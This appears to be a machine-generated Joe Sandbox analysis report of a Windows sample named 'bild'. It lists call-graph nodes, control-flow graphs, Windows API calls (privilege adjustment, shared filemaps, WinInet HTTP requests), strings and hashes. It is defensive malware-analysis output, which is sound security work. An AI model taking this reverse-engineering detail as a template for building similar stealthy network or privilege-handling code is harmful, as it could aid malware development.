std::_Mutex::_Mutex 90 API calls 100439->100440 100441 11145af2 100440->100441 100442 11145b30 100441->100442 100443 11145af9 LoadLibraryA 100441->100443 100442->100418 100444 11145b2a 100443->100444 100445 11145b0b GetProcAddress 100443->100445 100444->100418 100446 11145b23 FreeLibrary 100445->100446 100447 11145b1b 100445->100447 100446->100444 100447->100446 100448->100387 100449->100391 100450->100395 100451->100406 100452->100423 100453->100436 100454->100434 100455 1116970d 100456 1116971d 100455->100456 100457 11169718 100455->100457 100461 11169617 100456->100461 100473 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 100457->100473 100460 1116972b 100462 11169623 __lseeki64 100461->100462 100464 111696c0 __lseeki64 100462->100464 100468 11169670 100462->100468 100474 111694b3 100462->100474 100464->100460 100465 11169683 100467 111696a0 100465->100467 100469 11025e20 ___DllMainCRTStartup 7 API calls 100465->100469 100467->100464 100470 111694b3 __CRT_INIT@12 149 API calls 100467->100470 100468->100464 100524 11025e20 100468->100524 100471 11169697 100469->100471 100470->100464 100472 111694b3 __CRT_INIT@12 149 API calls 100471->100472 100472->100467 100473->100456 100475 111694bf __lseeki64 100474->100475 100476 111694c7 100475->100476 100477 11169541 100475->100477 100533 1116d4d0 HeapCreate 100476->100533 100479 11169547 100477->100479 100480 111695a2 100477->100480 100484 11169565 100479->100484 100492 111694d0 __lseeki64 100479->100492 100621 1116d79b 66 API calls _doexit 100479->100621 100481 111695a7 100480->100481 100482 11169600 100480->100482 100485 1116b5fa ___set_flsgetvalue 3 API calls 100481->100485 100482->100492 100627 1116b8fe 79 API calls __freefls@4 100482->100627 100483 111694cc 100483->100492 100534 1116b96c GetModuleHandleW 100483->100534 100488 11169579 100484->100488 100622 1117140e 67 API calls _free 100484->100622 100490 111695ac 100485->100490 100625 1116958c 70 API calls __mtterm 100488->100625 100491 11169dbe __calloc_crt 66 API calls 100490->100491 100496 111695b8 100491->100496 100492->100468 100493 111694dc __RTC_Initialize 100497 111694e0 100493->100497 100503 111694ec GetCommandLineA 100493->100503 100496->100492 100499 111695c4 DecodePointer 100496->100499 100618 1116d4ee HeapDestroy 100497->100618 100498 1116956f 100623 1116b64b 70 API calls _free 100498->100623 100504 111695d9 100499->100504 100502 11169574 100624 1116d4ee HeapDestroy 100502->100624 100559 11176f92 GetEnvironmentStringsW 100503->100559 100507 111695f4 100504->100507 100508 111695dd 100504->100508 100511 11162be5 _free 66 API calls 100507->100511 100626 1116b688 66 API calls 4 library calls 100508->100626 100511->100492 100513 111695e4 GetCurrentThreadId 100513->100492 100515 1116950a 100619 1116b64b 70 API calls _free 100515->100619 100519 1116952a 100519->100492 100620 1117140e 67 API calls _free 100519->100620 100525 1110f7d0 100524->100525 100526 1110f7f1 100525->100526 100527 1110f7dc 100525->100527 100529 1110f804 ___DllMainCRTStartup 100525->100529 100644 1110f720 100526->100644 100527->100529 100531 1110f720 ___DllMainCRTStartup 7 API calls 100527->100531 100529->100465 100530 1110f7f8 100530->100465 100532 1110f7e5 100531->100532 100532->100465 100533->100483 100535 1116b980 100534->100535 100536 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 100534->100536 100628 1116b64b 70 API calls _free 100535->100628 100538 1116b9d3 TlsAlloc 100536->100538 100541 1116bae2 100538->100541 100542 1116ba21 TlsSetValue 100538->100542 100539 1116b985 100539->100493 100541->100493 100542->100541 100543 1116ba32 100542->100543 100629 1116d557 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 100543->100629 100545 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 100630 111735c2 InitializeCriticalSectionAndSpinCount 100545->100630 100547 1116ba76 100548 1116badd 100547->100548 100549 1116ba7a DecodePointer 100547->100549 100632 1116b64b 70 API calls _free 100548->100632 100551 1116ba8f 100549->100551 100551->100548 100552 11169dbe __calloc_crt 66 API calls 100551->100552 100553 1116baa5 100552->100553 100553->100548 100554 1116baad DecodePointer 100553->100554 100555 1116babe 100554->100555 100555->100548 100556 1116bac2 100555->100556 100631 1116b688 66 API calls 4 library calls 100556->100631 100558 1116baca GetCurrentThreadId 100558->100541 100560 11176fae WideCharToMultiByte 100559->100560 100561 111694fc 100559->100561 100563 11176fe3 100560->100563 100564 1117701b FreeEnvironmentStringsW 100560->100564 100572 111711c9 GetStartupInfoW 100561->100572 100565 11169d79 __malloc_crt 66 API calls 100563->100565 100564->100561 100566 11176fe9 100565->100566 100566->100564 100567 11176ff1 WideCharToMultiByte 100566->100567 100568 11177003 100567->100568 100569 1117700f FreeEnvironmentStringsW 100567->100569 100570 11162be5 _free 66 API calls 100568->100570 100569->100561 100571 1117700b 100570->100571 100571->100569 100573 11169dbe __calloc_crt 66 API calls 100572->100573 100583 111711e7 100573->100583 100574 11171392 GetStdHandle 100580 1117135c 100574->100580 100575 11169dbe __calloc_crt 66 API calls 100575->100583 100576 111713f6 SetHandleCount 100579 11169506 100576->100579 100577 111713a4 GetFileType 100577->100580 100578 111712dc 100578->100580 100581 11171313 InitializeCriticalSectionAndSpinCount 100578->100581 100582 11171308 GetFileType 100578->100582 100579->100515 100585 11176ed7 100579->100585 100580->100574 100580->100576 100580->100577 100584 111713ca InitializeCriticalSectionAndSpinCount 100580->100584 100581->100578 100581->100579 100582->100578 100582->100581 100583->100575 100583->100578 100583->100579 100583->100580 100584->100579 100584->100580 100586 11176ef1 GetModuleFileNameA 100585->100586 100587 11176eec 100585->100587 100589 11176f18 100586->100589 100639 11170be7 94 API calls __setmbcp 100587->100639 100633 11176d3d 100589->100633 100592 11169516 100592->100519 100596 11176c61 100592->100596 100593 11169d79 __malloc_crt 66 API calls 100594 11176f5a 100593->100594 100594->100592 100595 11176d3d _parse_cmdline 76 API calls 100594->100595 100595->100592 100597 11176c6a 100596->100597 100599 11176c6f _strlen 100596->100599 100641 11170be7 94 API calls __setmbcp 100597->100641 100600 11169dbe __calloc_crt 66 API calls 100599->100600 100603 1116951f 100599->100603 100608 11176ca4 _strlen 100600->100608 100601 11176cf3 100602 11162be5 _free 66 API calls 100601->100602 100602->100603 100603->100519 100612 1116d5ae 100603->100612 100604 11169dbe __calloc_crt 66 API calls 100604->100608 100605 11176d19 100606 11162be5 _free 66 API calls 100605->100606 100606->100603 100607 1116be9f _strcpy_s 66 API calls 100607->100608 100608->100601 100608->100603 100608->100604 100608->100605 100608->100607 100609 11176d30 100608->100609 100610 1116deb2 __invoke_watson 10 API calls 100609->100610 100611 11176d3c 100610->100611 100613 1116d5bc __IsNonwritableInCurrentImage 100612->100613 100642 1116c9cb EncodePointer 100613->100642 100615 1116d5da __initterm_e 100617 1116d5fb __IsNonwritableInCurrentImage 100615->100617 100643 11162f15 76 API calls __cinit 100615->100643 100617->100519 100618->100492 100619->100497 100620->100515 100621->100484 100622->100498 100623->100502 100624->100488 100625->100492 100626->100513 100627->100492 100628->100539 100629->100545 100630->100547 100631->100558 100632->100541 100634 11176d5c 100633->100634 100637 11176dc9 100634->100637 100640 111766ce 76 API calls x_ismbbtype_l 100634->100640 100636 11176ec7 100636->100592 100636->100593 100637->100636 100638 111766ce 76 API calls _parse_cmdline 100637->100638 100638->100637 100639->100586 100640->100634 100641->100599 100642->100615 100643->100617 100645 1110f764 EnterCriticalSection 100644->100645 100646 1110f74f InitializeCriticalSection 100644->100646 100647 1110f785 100645->100647 100646->100645 100648 1110f7b3 LeaveCriticalSection 100647->100648 100649 1110f6c0 ___DllMainCRTStartup 4 API calls 100647->100649 100648->100530 100649->100647 100650 6c5d63a0 100651 6c5d63a5 100650->100651 100652 6c5d63a9 WSACancelBlockingCall 100651->100652 100653 6c5d63b1 Sleep 100651->100653

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 722 1109e812-1109e82d call 11161d01 720->722 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->728 729 1109e805-1109e80b call 1109d4d0 726->729 730 1109e316-1109e33b CreateFileMappingA 727->730 733 1109e2fa-1109e310 728->733 734 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->734 729->720 731 1109e388-1109e39b GetLastError 730->731 732 1109e33d-1109e35d GetLastError call 1112ef20 730->732 738 1109e39d 731->738 739 1109e3a2-1109e3b9 MapViewOfFile 731->739 747 1109e368-1109e370 732->747 748 1109e35f-1109e366 LocalFree 732->748 733->730 765 1109e2e9-1109e2f1 734->765 766 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 734->766 738->739 740 1109e3bb-1109e3d6 call 1112ef20 739->740 741 1109e3f7-1109e3ff 739->741 759 1109e3d8-1109e3d9 LocalFree 740->759 760 1109e3db-1109e3e3 740->760 745 1109e4a1-1109e4b3 741->745 746 1109e405-1109e41e GetModuleFileNameA 741->746 751 1109e4f9-1109e512 call 11161d20 GetTickCount 745->751 752 1109e4b5-1109e4b8 745->752 753 1109e4bd-1109e4d8 call 1112ef20 746->753 754 1109e424-1109e42d 746->754 755 1109e372-1109e373 LocalFree 747->755 756 1109e375-1109e37f 747->756 748->747 777 1109e514-1109e519 751->777 761 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 752->761 781 1109e4da-1109e4db LocalFree 753->781 782 1109e4dd-1109e4e5 753->782 754->753 762 1109e433-1109e436 754->762 755->756 764 1109e7fe-1109e800 call 1109d8c0 756->764 759->760 770 1109e3e8-1109e3f2 760->770 771 1109e3e5-1109e3e6 LocalFree 760->771 786 1109e60b-1109e622 CreateEventA 761->786 787 1109e605 761->787 773 1109e479-1109e49c call 1112ef20 call 1109d8c0 762->773 774 1109e438-1109e43c 762->774 764->729 765->733 768 1109e2f3-1109e2f4 FreeLibrary 765->768 766->765 767 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 766->767 767->765 768->733 770->764 771->770 773->745 774->773 780 1109e43e-1109e449 774->780 783 1109e51b-1109e52a 777->783 784 1109e52c 777->784 788 1109e450-1109e454 780->788 781->782 789 1109e4ea-1109e4f4 782->789 790 1109e4e7-1109e4e8 LocalFree 782->790 783->777 783->784 791 1109e52e-1109e534 784->791 795 1109e624-1109e643 GetLastError * 2 call 1112ef20 786->795 796 1109e646-1109e64e 786->796 787->786 793 1109e470-1109e472 788->793 794 1109e456-1109e458 788->794 789->764 790->789 801 1109e545-1109e59d 791->801 802 1109e536-1109e543 791->802 798 1109e475-1109e477 793->798 803 1109e45a-1109e460 794->803 804 1109e46c-1109e46e 794->804 795->796 799 1109e650 796->799 800 1109e656-1109e667 CreateEventA 796->800 798->753 798->773 799->800 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 800->807 808 1109e68b-1109e693 800->808 801->761 802->791 802->801 803->793 805 1109e462-1109e46a 803->805 804->798 805->788 805->804 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 816 1109e6db 814->816 817 1109e6e1-1109e6f2 CreateEventA 814->817 816->817 818 1109e714-1109e722 817->818 819 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->819 822 1109e724-1109e725 LocalFree 818->822 823 1109e727-1109e72f 818->823 819->818 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->764 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->764 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->722 839->838
                                                                                          APIs
                                                                                            • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,F3EE1E80,00080000,00000000,00000000), ref: 1109D46D
                                                                                            • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                            • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                            • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                          • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,F3EE1E80,00080000,00000000,00000000), ref: 1109E225
                                                                                          • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                          • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                          • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                          • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                          • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                          • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                          • GetLastError.KERNEL32 ref: 1109E33D
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                          • GetLastError.KERNEL32 ref: 1109E390
                                                                                          • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                            • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                            • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                          • _memset.LIBCMT ref: 1109E500
                                                                                          • GetTickCount.KERNEL32 ref: 1109E508
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                          • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                          • GetLastError.KERNEL32 ref: 1109E624
                                                                                          • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                          • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                          • GetLastError.KERNEL32 ref: 1109E669
                                                                                          • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                          • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                          • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                          • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                          • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                          • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                          • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                          • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                          • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                          • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                          • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                          • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                          • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                          • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                          • API String ID: 3291243470-2792520954
                                                                                          • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                          • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                          • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                          • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 855 1102972a-1102972d 851->855 856 1102968b-11029697 call 11162b51 851->856 853 11029653-1102966a GetProcAddress 852->853 854 1102966c-1102966f InternetCloseHandle 852->854 853->854 857 11029671-11029673 SetLastError 853->857 854->851 859 11029748-11029760 InternetOpenA 855->859 860 1102972f-11029746 GetProcAddress 855->860 862 1102969c-110296a3 856->862 857->851 861 11029784-11029790 call 11162be5 859->861 860->859 863 11029779-11029781 SetLastError 860->863 871 11029796-110297c7 call 11142290 call 11164390 861->871 872 11029a0a-11029a14 861->872 865 110296c4-110296d0 862->865 866 110296a5-110296be GetProcAddress 862->866 863->861 870 110296d2-110296db GetLastError 865->870 873 110296f1-110296f3 865->873 866->865 868 11029762-1102976a SetLastError 866->868 868->870 870->873 874 110296dd-110296ef call 11162be5 call 11162b51 870->874 896 110297c9-110297cc 871->896 897 110297cf-110297e4 call 11081a70 * 2 871->897 872->845 875 11029a1a 872->875 879 11029710-1102971c 873->879 880 110296f5-1102970e GetProcAddress 873->880 874->873 878 11029a2c-11029a2f 875->878 885 11029a31-11029a36 878->885 886 11029a3b-11029a3e 878->886 879->855 898 1102971e-11029727 879->898 880->879 883 1102976f-11029777 SetLastError 880->883 883->855 889 11029b9f-11029ba7 885->889 891 11029a40-11029a45 886->891 892 11029a4a 886->892 894 11029bb0-11029bc3 889->894 895 11029ba9-11029baa FreeLibrary 889->895 899 11029b6f-11029b74 891->899 900 11029a4d-11029a55 892->900 895->894 896->897 916 110297e6-110297ea 897->916 917 110297ed-110297f9 897->917 898->855 901 11029b76-11029b8d GetProcAddress 899->901 902 11029b8f-11029b95 899->902 904 11029a57-11029a6e GetProcAddress 900->904 905 11029a74-11029a82 900->905 901->902 907 11029b97-11029b99 SetLastError 901->907 902->889 904->905 906 11029b2e-11029b30 SetLastError 904->906 911 11029b36-11029b3d 905->911 914 11029a88-11029a8d 905->914 906->911 907->889 915 11029b4c-11029b6d call 110278a0 * 2 911->915 914->915 918 11029a93-11029acf call 1110f4a0 call 11027850 914->918 915->899 916->917 920 11029824-11029829 917->920 921 110297fb-110297fd 917->921 944 11029ae1-11029ae3 918->944 945 11029ad1-11029ad4 918->945 928 1102982b-1102983c GetProcAddress 920->928 929 1102983e-11029855 InternetConnectA 920->929 925 11029814-1102981a 921->925 926 110297ff-11029812 GetProcAddress 921->926 925->920 926->925 931 1102981c-1102981e SetLastError 926->931 928->929 933 11029881-1102988c SetLastError 928->933 934 110299f7-11029a07 call 111618c1 929->934 935 1102985b-1102985e 929->935 931->920 933->934 934->872 939 11029860-11029862 935->939 940 11029899-110298a1 935->940 946 11029864-11029877 GetProcAddress 939->946 947 11029879-1102987f 939->947 942 110298a3-110298b7 GetProcAddress 940->942 943 110298b9-110298d4 HttpOpenRequestA 940->943 942->943 948 110298d6-110298de SetLastError 942->948 949 110298e1-110298e4 943->949 951 11029ae5 944->951 952 11029aec-11029af1 944->952 945->944 950 11029ad6-11029ada 945->950 946->947 953 11029891-11029893 SetLastError 946->953 947->940 948->949 955 110299f2-110299f5 949->955 956 110298ea-110298ef 949->956 950->944 957 11029adc 950->957 951->952 958 11029af3-11029b09 call 110d1090 952->958 959 11029b0c-11029b0e 952->959 953->940 955->934 961 11029a1c-11029a29 call 111618c1 955->961 964 110298f1-11029908 GetProcAddress 956->964 965 1102990a-11029916 956->965 957->944 958->959 962 11029b10-11029b12 959->962 963 11029b14-11029b25 call 111618c1 959->963 961->878 962->963 967 11029b3f-11029b49 call 111618c1 962->967 963->915 978 11029b27-11029b29 963->978 964->965 970 11029918-11029920 SetLastError 964->970 975 11029922-1102993b GetLastError 965->975 967->915 970->975 976 11029956-1102996b 975->976 977 1102993d-11029954 GetProcAddress 975->977 982 11029975-11029983 GetLastError 976->982 977->976 980 1102996d-1102996f SetLastError 977->980 978->900 980->982 983 11029985-1102998a 982->983 984 1102998c-11029998 GetDesktopWindow 982->984 983->984 985 110299e2-110299e7 983->985 986 110299b3-110299cf 984->986 987 1102999a-110299b1 GetProcAddress 984->987 985->955 989 110299e9-110299ef 985->989 986->955 991 110299d1 986->991 987->986 988 110299d6-110299e0 SetLastError 987->988 988->955 989->955 991->949
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(WinInet.dll,F3EE1E80,759223A0,?,00000000), ref: 110295C5
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                          • InternetCloseHandle.WININET(000000FF), ref: 1102966D
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                          • _malloc.LIBCMT ref: 11029697
                                                                                          • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                          • GetLastError.KERNEL32 ref: 110296D2
                                                                                          • _free.LIBCMT ref: 110296DE
                                                                                          • _malloc.LIBCMT ref: 110296E7
                                                                                          • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                          • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                          • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                          • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                          • _free.LIBCMT ref: 11029785
                                                                                            • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                            • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                          • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                          • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                          • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                          • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                          • HttpOpenRequestA.WININET(?,GET,111996A8,00000000,00000000,00000000,8040F000,00000000), ref: 110298CF
                                                                                          • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                          • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                          • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                          • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
                                                                                          • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                          • API String ID: 2589145992-913974648
                                                                                          • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                          • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                          • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                          • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
